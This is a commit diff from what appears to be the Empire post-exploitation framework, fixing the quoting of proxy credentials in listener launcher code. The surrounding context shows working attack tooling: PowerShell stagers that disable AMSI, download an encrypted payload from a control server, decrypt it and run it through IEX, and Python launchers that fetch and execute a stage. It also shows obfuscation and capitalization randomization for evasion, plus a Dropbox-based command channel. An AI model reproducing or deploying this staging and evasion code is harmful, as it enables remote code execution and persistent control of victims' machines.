Merge pull request #728 from dirkjanm/dev
Fixed custom proxy config in launcher codewebsockets-multiuser
Steve Borosh
GitHub
commit
223079597c
|
|
@ -222,7 +222,7 @@ class Listener:
|
|||
password = proxyCreds.split(':')[1]
|
||||
domain = username.split('\\')[0]
|
||||
usr = username.split('\\')[1]
|
||||
stager += "$netcred = New-Object System.Net.NetworkCredential("+usr+","+password+","+domain+");"
|
||||
stager += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"','"+domain+"');"
|
||||
stager += helpers.randomize_capitalization("$wc.Proxy.Credentials = $netcred;")
|
||||
|
||||
#save the proxy settings to use during the entire staging process and the agent
|
||||
|
|
@ -307,7 +307,7 @@ class Listener:
|
|||
launcherBase += "proxy_auth_handler = urllib2.ProxyBasicAuthHandler();\n"
|
||||
username = proxyCreds.split(':')[0]
|
||||
password = proxyCreds.split(':')[1]
|
||||
launcherBase += "proxy_auth_handler.add_password(None,"+proxy+","+username+","+password+");\n"
|
||||
launcherBase += "proxy_auth_handler.add_password(None,'"+proxy+"','"+username+"','"+password+"');\n"
|
||||
launcherBase += "o = urllib2.build_opener(proxy, proxy_auth_handler);\n"
|
||||
else:
|
||||
launcherBase += "o = urllib2.build_opener(proxy);\n"
|
||||
|
|
@ -484,7 +484,7 @@ class Listener:
|
|||
#strip out comments and blank lines
|
||||
code = helpers.strip_python_comments(code)
|
||||
|
||||
#patch some more
|
||||
#patch some more
|
||||
code = code.replace('delay = 60', 'delay = %s' % (delay))
|
||||
code = code.replace('jitter = 0.0', 'jitter = %s' % (jitter))
|
||||
code = code.replace('profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', 'profile = "%s"' % (profile))
|
||||
|
|
@ -661,16 +661,16 @@ def send_message(packets=None):
|
|||
except:
|
||||
pass
|
||||
|
||||
|
||||
|
||||
if packets:
|
||||
data = ''.join(packets)
|
||||
# aes_encrypt_then_hmac is in stager.py
|
||||
encData = aes_encrypt_then_hmac(key, data)
|
||||
data = build_routing_packet(stagingKey, sessionID, meta=5, encData=encData)
|
||||
#check to see if there are any results already present
|
||||
|
||||
|
||||
headers['Dropbox-API-Arg'] = "{\\"path\\":\\"%s/%s.txt\\"}" % (resultsFolder, sessionID)
|
||||
|
||||
|
||||
try:
|
||||
pkdata = post_message('https://content.dropboxapi.com/2/files/download', data=None, headers=headers)
|
||||
except:
|
||||
|
|
@ -953,7 +953,7 @@ def send_message(packets=None):
|
|||
dbx.files_delete(fileName)
|
||||
except dropbox.exceptions.ApiError:
|
||||
dispatcher.send("[!] Error deleting data at '%s'" % (fileName), sender="listeners/dropbox")
|
||||
|
||||
|
||||
self.mainMenu.agents.handle_agent_data(stagingKey, responseData, listenerOptions)
|
||||
|
||||
|
||||
|
|
|
|||
|
|
@ -243,7 +243,7 @@ class Listener:
|
|||
password = proxyCreds.split(':')[1]
|
||||
domain = username.split('\\')[0]
|
||||
usr = username.split('\\')[1]
|
||||
stager += "$netcred = New-Object System.Net.NetworkCredential("+usr+","+password+","+domain+");"
|
||||
stager += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"','"+domain+"');"
|
||||
stager += helpers.randomize_capitalization("$wc.Proxy.Credentials = $netcred;")
|
||||
|
||||
#save the proxy settings to use during the entire staging process and the agent
|
||||
|
|
@ -259,7 +259,7 @@ class Listener:
|
|||
if "https" in host:
|
||||
host = 'https://' + '[' + str(bindIP) + ']' + ":" + str(port)
|
||||
else:
|
||||
host = 'http://' + '[' + str(bindIP) + ']' + ":" + str(port)
|
||||
host = 'http://' + '[' + str(bindIP) + ']' + ":" + str(port)
|
||||
|
||||
# code to turn the key string into a byte array
|
||||
stager += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(")
|
||||
|
|
@ -296,7 +296,7 @@ class Listener:
|
|||
|
||||
# decode everything and kick it over to IEX to kick off execution
|
||||
stager += helpers.randomize_capitalization("-join[Char[]](& $R $data ($IV+$K))|IEX")
|
||||
|
||||
|
||||
if obfuscate:
|
||||
stager = helpers.obfuscate(stager, obfuscationCommand=obfuscationCommand)
|
||||
# base64 encode the stager and return it
|
||||
|
|
@ -338,7 +338,7 @@ class Listener:
|
|||
# prebuild the request routing packet for the launcher
|
||||
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='PYTHON', meta='STAGE0', additional='None', encData='')
|
||||
b64RoutingPacket = base64.b64encode(routingPacket)
|
||||
|
||||
|
||||
launcherBase += "req=urllib2.Request(server+t);\n"
|
||||
# add the RC4 packet to a cookie
|
||||
launcherBase += "req.add_header('User-Agent',UA);\n"
|
||||
|
|
@ -352,7 +352,7 @@ class Listener:
|
|||
#launcherBase += ",\"%s\":\"%s\"" % (headerKey, headerValue)
|
||||
launcherBase += "req.add_header(\"%s\",\"%s\");\n" % (headerKey, headerValue)
|
||||
|
||||
|
||||
|
||||
if proxy.lower() != "none":
|
||||
if proxy.lower() == "default":
|
||||
launcherBase += "proxy = urllib2.ProxyHandler();\n"
|
||||
|
|
@ -367,7 +367,7 @@ class Listener:
|
|||
launcherBase += "proxy_auth_handler = urllib2.ProxyBasicAuthHandler();\n"
|
||||
username = proxyCreds.split(':')[0]
|
||||
password = proxyCreds.split(':')[1]
|
||||
launcherBase += "proxy_auth_handler.add_password(None,"+proxy+","+username+","+password+");\n"
|
||||
launcherBase += "proxy_auth_handler.add_password(None,'"+proxy+"','"+username+"','"+password+"');\n"
|
||||
launcherBase += "o = urllib2.build_opener(proxy, proxy_auth_handler);\n"
|
||||
else:
|
||||
launcherBase += "o = urllib2.build_opener(proxy);\n"
|
||||
|
|
@ -378,7 +378,7 @@ class Listener:
|
|||
launcherBase += "urllib2.install_opener(o);\n"
|
||||
|
||||
# download the stager and extract the IV
|
||||
|
||||
|
||||
launcherBase += "a=urllib2.urlopen(req).read();\n"
|
||||
launcherBase += "IV=a[0:4];"
|
||||
launcherBase += "data=a[4:];"
|
||||
|
|
@ -419,8 +419,8 @@ class Listener:
|
|||
if not language:
|
||||
print helpers.color('[!] listeners/http generate_stager(): no language specified!')
|
||||
return None
|
||||
|
||||
|
||||
|
||||
|
||||
profile = listenerOptions['DefaultProfile']['Value']
|
||||
uris = [a.strip('/') for a in profile.split('|')[0].split(',')]
|
||||
launcher = listenerOptions['Launcher']['Value']
|
||||
|
|
@ -475,7 +475,7 @@ class Listener:
|
|||
randomizedStager += helpers.randomize_capitalization(line)
|
||||
else:
|
||||
randomizedStager += line
|
||||
|
||||
|
||||
if obfuscate:
|
||||
randomizedStager = helpers.obfuscate(randomizedStager, obfuscationCommand=obfuscationCommand)
|
||||
# base64 encode the stager and return it
|
||||
|
|
@ -638,7 +638,7 @@ class Listener:
|
|||
if($Script:Proxy) {
|
||||
$wc.Proxy = $Script:Proxy;
|
||||
}
|
||||
|
||||
|
||||
$wc.Headers.Add("User-Agent",$script:UserAgent)
|
||||
$script:Headers.GetEnumerator() | % {$wc.Headers.Add($_.Name, $_.Value)}
|
||||
$wc.Headers.Add("Cookie", "session=$RoutingCookie")
|
||||
|
|
@ -680,7 +680,7 @@ class Listener:
|
|||
if($Script:Proxy) {
|
||||
$wc.Proxy = $Script:Proxy;
|
||||
}
|
||||
|
||||
|
||||
$wc.Headers.Add('User-Agent', $Script:UserAgent)
|
||||
$Script:Headers.GetEnumerator() | ForEach-Object {$wc.Headers.Add($_.Name, $_.Value)}
|
||||
|
||||
|
|
@ -783,7 +783,7 @@ def send_message(packets=None):
|
|||
app = Flask(__name__)
|
||||
self.app = app
|
||||
|
||||
|
||||
|
||||
@app.route('/<string:stagerURI>')
|
||||
def send_stager(stagerURI):
|
||||
if stagerURI:
|
||||
|
|
@ -987,4 +987,4 @@ def send_message(packets=None):
|
|||
self.threads[name].kill()
|
||||
else:
|
||||
print helpers.color("[!] Killing listener '%s'" % (self.options['Name']['Value']))
|
||||
self.threads[self.options['Name']['Value']].kill()
|
||||
self.threads[self.options['Name']['Value']].kill()
|
||||
|
|
|
|||
|
|
@ -141,7 +141,7 @@ class Listener:
|
|||
uris = [a for a in profile.split('|')[0].split(',')]
|
||||
stage0 = random.choice(uris)
|
||||
customHeaders = profile.split('|')[2:]
|
||||
|
||||
|
||||
if language.startswith('po'):
|
||||
# PowerShell
|
||||
|
||||
|
|
@ -164,7 +164,7 @@ class Listener:
|
|||
stager += "'amsiInitFailed','NonPublic,Static'"
|
||||
stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
|
||||
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
|
||||
|
||||
|
||||
stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;")
|
||||
|
||||
if userAgent.lower() == 'default':
|
||||
|
|
@ -198,7 +198,7 @@ class Listener:
|
|||
password = proxyCreds.split(':')[1]
|
||||
domain = username.split('\\')[0]
|
||||
usr = username.split('\\')[1]
|
||||
stager += "$netcred = New-Object System.Net.NetworkCredential("+usr+","+password+","+domain+");"
|
||||
stager += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"','"+domain+"');"
|
||||
stager += helpers.randomize_capitalization("$wc.Proxy.Credentials = $netcred;")
|
||||
|
||||
# TODO: reimplement stager retries?
|
||||
|
|
@ -210,7 +210,7 @@ class Listener:
|
|||
headerValue = header.split(':')[1]
|
||||
stager += helpers.randomize_capitalization("$wc.Headers.Add(")
|
||||
stager += "\"%s\",\"%s\");" % (headerKey, headerValue)
|
||||
|
||||
|
||||
# code to turn the key string into a byte array
|
||||
stager += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(")
|
||||
stager += "'%s');" % (stagingKey)
|
||||
|
|
@ -294,7 +294,7 @@ class Listener:
|
|||
launcherBase += "proxy_auth_handler = urllib2.ProxyBasicAuthHandler();\n"
|
||||
username = proxyCreds.split(':')[0]
|
||||
password = proxyCreds.split(':')[1]
|
||||
launcherBase += "proxy_auth_handler.add_password(None,"+proxy+","+username+","+password+");\n"
|
||||
launcherBase += "proxy_auth_handler.add_password(None,'"+proxy+"','"+username+"','"+password+"');\n"
|
||||
launcherBase += "o = urllib2.build_opener(proxy, proxy_auth_handler);\n"
|
||||
else:
|
||||
launcherBase += "o = urllib2.build_opener(proxy);\n"
|
||||
|
|
@ -363,12 +363,12 @@ class Listener:
|
|||
|
||||
if language:
|
||||
if language.lower() == 'powershell':
|
||||
|
||||
|
||||
updateServers = """
|
||||
$Script:ControlServers = @("%s");
|
||||
$Script:ServerIndex = 0;
|
||||
""" % (listenerOptions['Host']['Value'])
|
||||
|
||||
|
||||
getTask = """
|
||||
function script:Get-Task {
|
||||
|
||||
|
|
|
|||
|
|
@ -176,7 +176,7 @@ class Listener:
|
|||
password = proxyCreds.split(':')[1]
|
||||
domain = username.split('\\')[0]
|
||||
usr = username.split('\\')[1]
|
||||
stager += "$netcred = New-Object System.Net.NetworkCredential("+usr+","+password+","+domain+");"
|
||||
stager += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"','"+domain+"');"
|
||||
stager += helpers.randomize_capitalization("$wc.Proxy.Credentials = $netcred;")
|
||||
|
||||
# TODO: reimplement stager retries?
|
||||
|
|
@ -247,7 +247,7 @@ class Listener:
|
|||
# add the RC4 packet to a cookie
|
||||
launcherBase += "o.addheaders=[('User-Agent',UA), (\"Cookie\", \"session=%s\")];\n" % (b64RoutingPacket)
|
||||
launcherBase += "import urllib2\n"
|
||||
|
||||
|
||||
if proxy.lower() != "none":
|
||||
if proxy.lower() == "default":
|
||||
launcherBase += "proxy = urllib2.ProxyHandler();\n"
|
||||
|
|
@ -262,7 +262,7 @@ class Listener:
|
|||
launcherBase += "proxy_auth_handler = urllib2.ProxyBasicAuthHandler();\n"
|
||||
username = proxyCreds.split(':')[0]
|
||||
password = proxyCreds.split(':')[1]
|
||||
launcherBase += "proxy_auth_handler.add_password(None,"+proxy+","+username+","+password+");\n"
|
||||
launcherBase += "proxy_auth_handler.add_password(None,'"+proxy+"','"+username+"','"+password+"');\n"
|
||||
launcherBase += "o = urllib2.build_opener(proxy, proxy_auth_handler);\n"
|
||||
else:
|
||||
launcherBase += "o = urllib2.build_opener(proxy);\n"
|
||||
|
|
@ -271,7 +271,7 @@ class Listener:
|
|||
|
||||
#install proxy and creds globally, so they can be used with urlopen.
|
||||
launcherBase += "urllib2.install_opener(o);\n"
|
||||
|
||||
|
||||
# download the stager and extract the IV
|
||||
launcherBase += "a=o.open(server+t).read();"
|
||||
launcherBase += "IV=a[0:4];"
|
||||
|
|
|
|||
Loading…
Reference in New Issue